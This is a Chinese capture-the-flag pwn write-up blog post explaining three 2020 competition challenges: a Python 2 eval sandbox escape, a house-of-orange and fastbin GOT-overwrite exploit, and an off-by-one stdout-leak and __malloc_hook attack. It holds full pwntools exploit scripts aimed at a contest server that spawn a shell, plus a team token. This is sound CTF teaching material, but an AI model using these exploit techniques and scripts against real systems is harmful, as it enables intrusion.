2020国赛线上赛 pwn wp

babyjsc

题目给了一大堆文件,先nc上测一下,直接enter可以看到返回的错误信息,知道远程服务器为server.py
然后把下载下来的文件解压,搜索server.py ,查看可知


Python 2 的 input() 等价于 eval(raw_input())，会直接对输入求值，因此可以借此逃逸沙箱：输入 `__import__('os').system('cat /home/ctf/flag')` 即可读到 flag（原文的 `import('os')` 是渲染时丢掉了前后的双下划线）。

nofree

申请堆块时用的是 strdup，它按输入字符串的实际长度来分配堆块，而程序记录的却是用户指定的 size；例如 add(0,0x90,'aaaa') 实际只分配了一个很小的 chunk，之后 edit 按 0x90 写入就会造成堆溢出。
此题没有 free 功能，利用 house of orange 攻击（改小 top chunk 的 size，再申请一个放不下的堆块，让 sysmalloc 把旧 top 释放掉）得到一个 free 过的堆块，然后伪造 size，通过溢出把该堆块的 fd 改成 chunklist 附近的地址，再用 fastbin attack 把堆块申请到 chunklist 上，从而控制堆块指针；把 chunklist[1] 改成 strdup 的 got 表项地址，用 edit 把 strdup 的 got 表项改成 printf 的 plt 地址（脚本里是 elf.plt["printf"]），这样下一次 add 实际调用的是 printf(输入)，利用格式化字符串漏洞泄露 libc_addr；最后再把 strdup 的 got 表项改成 system 的地址，然后申请内容为 "/bin/sh" 的堆块，strdup("/bin/sh") 就变成了 system("/bin/sh")，即可得到 shell。

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import sys
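context.log_level = 'debug'
pwn_name = "pwn"
arch = '64'
version = '2.23'  # target glibc version; the libc used below must match it
ip, port = '101.200.53.148', 12301
#context.terminal = ['tmux', 'splitw', '-h']
#context(os='linux', arch='i386')

# Usage: `python exp.py l` runs the binary locally, anything else (including
# no argument at all) attacks the remote service. The original indexed
# sys.argv[1] unconditionally and died with IndexError when run bare.
if len(sys.argv) > 1 and sys.argv[1] == "l":
    p = process('./' + pwn_name)
else:
    p = remote(ip, port)

# NOTE(review): both modes load the host's libc. Against the remote target
# this has to be the libc the challenge actually runs (see `version`),
# otherwise every libc.sym[...] lookup -- and thus the final system() call --
# is off.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)

elf = ELF(pwn_name, checksec=False)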


def info(con, leak):
    """Print a leaked value as `<label> => 0x...` via pwntools' success()."""
    message = "%s => %#x" % (con, leak)
    success(message)

def dbg(address=0):
    """Attach gdb to the global tube `p`.

    With address == 0: attach and pause so the user can poke around.
    Otherwise break at `address` and continue. Values above 0xfffff are
    taken as absolute; smaller ones are assumed to be PIE offsets and are
    rebased with gdb's $rebase.
    """
    if address == 0:
        gdb.attach(p)
        pause()
        return

    if address > 0xfffff:
        template = "b *{:#x}\nc\n"
    else:
        template = "b *$rebase({:#x})\nc\n"
    gdb.attach(p, template.format(address))

#---------------heap-------------
def choice(idx):
    """Answer the `>> ` menu prompt with option number `idx`."""
    option = str(idx)
    p.sendlineafter(">> ", option)

def add(idx, size, content):
    """Menu option 1: allocate slot `idx` with recorded `size` and `content`.

    `content` is sent raw (no trailing newline); the program copies it with
    strdup(), so the real allocation is strlen(content) bytes, not `size`.
    """
    choice(1)
    for prompt, value in ((": ", str(idx)), (': ', str(size))):
        p.sendlineafter(prompt, value)
    p.sendafter(': ', content)

def edit(idx, content):
    """Menu option 2: overwrite slot `idx` with `content` (sent raw).

    The program writes up to the *recorded* size of the slot, which is what
    makes the strdup() under-allocation in add() exploitable.
    """
    choice(2)
    slot = str(idx)
    p.sendlineafter(': ', slot)
    p.sendafter(': ', content)

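#---------house of orange-------------
# strdup() allocates by strlen(), so a 4-byte string gets a tiny chunk even
# though the program records 0x90 for this slot: edit(0) can now overflow.
add(0,0x90,'a'*0x4)

# Overflow: the three zero qwords pad up to the next chunk's size field, which
# is the top chunk; shrink it to 0xfe1 (house of orange, step 1).
edit(0,p64(0)*3+p64(0xfe1))

# Drain the shrunken top. When a later request no longer fits, sysmalloc()
# frees the old top for us -- the only way to get a freed chunk in a
# program with no free().
for i in range(0,0x1e):
    add(1,0x70,chr(i)*0x70)

# Remaining top is carved up so that slot 0 ends up adjacent to what is left
# of it; exact sizes were worked out in gdb for this binary.
add(0,0x81,chr(0x20)*0x40)
add(0,0x71,chr(0x21)*0x40)

add(1,0x90,chr(0x22)*0x90) # does not fit: old top gets freed (fastbin)
#----------fastbin attack-----------
# Through slot 0, rewrite the freed chunk's header: size 0x81 and fd pointing
# at 0x602128, a bss address next to the chunk list (per the write-up).
edit(0,p64(0x20)*8+p64(0)+p64(0x81)+p64(0x602128))

# Two 0x80-sized requests: the first takes the forged chunk, the second is
# served from 0x602128, i.e. on top of the chunk list.
add(0,0x90,chr(0x23)*0x70+p64(0x81))
add(0,0x90,chr(0x24)*0x70+p64(0x81))

#---------chunklist attack---------
# Point slot 0's pointer at the chunk list itself (0x6021c0 per the write-up)
edit(0,"e"*0x88+p64(0x6021c0))

# ... then lay the list out as [ptr0, size0, ptr1, size1]: slot 1 now aliases
# strdup's GOT entry (0x602068 per the write-up) with a generous size.
edit(0,p64(0x6021c0)+p64(0x100)+p64(0x602068)+p64(0x100))

# strdup@got -> printf@plt: the next add() effectively calls printf(input),
# so "%17$p" prints a stack slot holding a libc return address.
edit(1,p64(elf.plt["printf"]))
add(2,0x90,"%17$p")

p.recvuntil("0x")
# %17$p is the return into __libc_start_main, which sits at +240 from the
# symbol on the glibc 2.23 build this was written against (found with gdb;
# re-check for any other build).
libc_base = int(p.recv(12),16) -240-libc.sym["__libc_start_main"]
info("libc_base",libc_base)
# Resolve system() from the same libc object the leak was computed against.
# The original hard-coded 0x45390 (the 2.23 Ubuntu offset); mixing a symbol
# lookup for the leak with a literal for the target silently breaks as soon
# as the libc file changes.
sys_addr = libc_base + libc.sym["system"]
info("sys_addr",sys_addr)

# strdup@got -> system: add(2, "/bin/sh") now runs system("/bin/sh").
edit(1,p64(sys_addr))
add(2,0x90,"/bin/sh")

p.interactive()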

easybox

off-by-one 漏洞，没有 show 功能，老套路了：布局堆块，用溢出的那一个字节把下一个堆块的 size 改大，使它覆盖多个堆块，然后 free；根据 unsorted bin 的特性，fastbin 中会残留一个指向 main_arena 的地址，再只改写它的低 2 字节——低 12 位不受 ASLR 影响，只需猜 4 位，所以有十六分之一的概率正好落到 stdout_addr-0x43，然后 fastbin attack 打 _IO_2_1_stdout_，把 _flags 改为 0xfbad1887 并清空读指针即可泄露出 libc_addr，再次 fastbin attack 打 __malloc_hook 写成 one_gadget。

from pwn import *

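def exp():
    """Run one attempt of the easybox exploit against the remote service.

    Stages (see the write-up above):
      1. Off-by-one: enlarge a neighbour's size so one chunk overlaps several
         others, free it, and leave a main_arena pointer in a fastbin.
      2. Partially overwrite the low 2 bytes of that pointer to land on
         _IO_2_1_stdout_-0x43; 4 of those bits are ASLR, so ~1/16 attempts
         survive the fastbin size check.
      3. Fastbin attack onto stdout: _flags = 0xfbad1887 and zeroed read
         pointers make the next write leak libc pointers.
      4. Fastbin attack onto __malloc_hook and write a one_gadget there.

    Any exception (wrong guess, connection reset, unexpected prompt) is
    printed and the connection closed so the caller's retry loop starts
    clean. The original called p.close() in the handler even when remote()
    itself had failed, which raised NameError and killed the retry loop.
    """
    import os

    p = None
    try:
        p = remote("101.200.53.148", 34521)
        #p = process('./pwn')
        # NOTE(review): every libc offset below (the 0x25dd stdout guess, the
        # one_gadget list, the stdin symbol used for the leak) belongs to one
        # specific libc build; use the libc shipped with the challenge.
        libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

        def dbg(address=0):
            """Attach gdb; addresses <= 0xfffff are treated as PIE offsets."""
            if address == 0:
                gdb.attach(p)
                pause()
                return
            if address > 0xfffff:
                script = "b *{:#x}\nc\n".format(address)
            else:
                script = "b *$rebase({:#x})\nc\n".format(address)
            gdb.attach(p, script)

        def info(con, leak):
            """Print `<label> => 0x...` for a leaked value."""
            success('{} => {:#x}'.format(con, leak))

        def add(idx, size, content):
            """Menu 1: allocate slot idx of `size` bytes and write content."""
            p.sendlineafter('>>>', '1')
            p.sendlineafter('idx:\n', str(idx))
            p.sendlineafter('len:\n', str(size))
            p.sendafter('content:\n', content)

        def delete(idx):
            """Menu 2: free slot idx."""
            p.sendlineafter('>>>', '2')
            p.sendlineafter('idx:', str(idx))

        # ---- stage 1: layout and overlapping chunk ------------------------
        add(0, 0xf0, 'a' * 8)
        add(1, 0x60, 'b' * 8)
        add(2, 0x88, 'c' * 8)
        add(3, 0xf8, 'd' * 8)
        add(4, 0xf0, 'e' * 8)
        add(5, 0xf0, 'f' * 8)

        #dbg()
        delete(3)
        delete(0)
        # Re-take slot 3 and use the one extra byte to set chunk 4's size to
        # 0x300, so chunk 4 now spans chunks 4 and 5.
        add(3, 0xf8, '\x00' * 0xf0 + p64(0x300) + '\x00')
        delete(4)
        delete(1)
        add(0, 0xf0, 'aaa')
        delete(0)
        # Write through the overlap: forge a 0x71 fastbin header and replace
        # only the low 2 bytes of its fd (a leftover main_arena pointer) with
        # 0x25dd -> _IO_2_1_stdout_-0x43 when the 4 guessed bits are right.
        add(0, 0x130, '\x00' * 0xf0 + p64(0) + p64(0x71) + '\xdd\x25')

        # ---- stage 2/3: fastbin attack on _IO_2_1_stdout_ -----------------
        add(1, 0x68, 'aaa')
        # 0x33 bytes of padding reach _flags; then _flags = 0xfbad1887,
        # _IO_read_{ptr,end,base} = 0, and the low byte of _IO_write_base
        # is lowered to 0x88 so stdout flushes libc pointers to us.
        add(4, 0x68, '\x00' * 0x33 + p64(0xfbad1887) + p64(0) * 3 + '\x88')

        # First 0x7f-terminated value in the leak is a pointer to _IO_2_1_stdin_.
        libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - libc.sym['_IO_2_1_stdin_']

        info('libc_base', libc_base)
        malloc_hook = libc_base + libc.sym['__malloc_hook']
        # Alternative target the author tried instead of __malloc_hook:
        # _IO_list_all at libc_base + 0x3c54fd (not used below).

        # one_gadget offsets for this libc; index 2 (0xf0364) is the one
        # whose constraints hold here. An earlier build used
        # [0x45216, 0x4526a, 0xf02a4, 0xf1147].
        one = [0x45226, 0x4527a, 0xf0364, 0xf1207]

        # ---- stage 4: fastbin attack on __malloc_hook ---------------------
        add(6, 0x28, "\x41" * 8)
        add(7, 0x68, '\x42' * 8)
        add(8, 0x68, '\x43' * 8)
        delete(6)
        # Off-by-one again: chunk 7's size becomes 0xe1 and swallows chunk 8.
        add(6, 0x28, "0" * 0x28 + '\xe1')

        delete(8)
        delete(7)
        # Re-take the enlarged chunk 7 and rewrite chunk 8's header inside it:
        # keep size 0x71, set fd = __malloc_hook-0x23 (a 0x7f byte there
        # passes the fastbin size check as a 0x70-class chunk).
        add(8, 0xa0, "3" * 0x68 + p64(0x71) + p64(malloc_hook - 0x23))

        add(7, 0x68, "\x44" * 8)

        # This allocation lands at __malloc_hook-0x13; 0x13 filler then the
        # gadget address overwrites the hook.
        add(9, 0x68, "a" * 0x13 + p64(libc_base + one[2]))
        # Freeing the fake libc chunk presumably hits free()'s error path,
        # which on 2.23 reaches malloc() and so the hook -- TODO confirm.
        delete(9)
        # Per-team token for the challenge wrapper. Read it from the
        # environment so the secret is not baked into the script; the
        # literal default keeps the original behaviour.
        token = os.environ.get("CTF_TOKEN", 'icq700049c29f86f68a9b934524cf619')
        p.sendlineafter("please input your token:", token)
        p.sendline("cat flag")
        p.interactive()

    except Exception as e:
        print(e)
        if p is not None:
            p.close()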

# The stdout address guess only succeeds about 1 time in 16, so keep
# reconnecting until a run gets through. exp() only swallows Exception,
# so Ctrl-C (KeyboardInterrupt) still stops the loop.
while True:
    exp()
文章作者: nocbtm
文章链接: https://nocbtm.github.io/2020/08/22/2020国赛线上赛-pwn-wp/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 nocbtm's Blog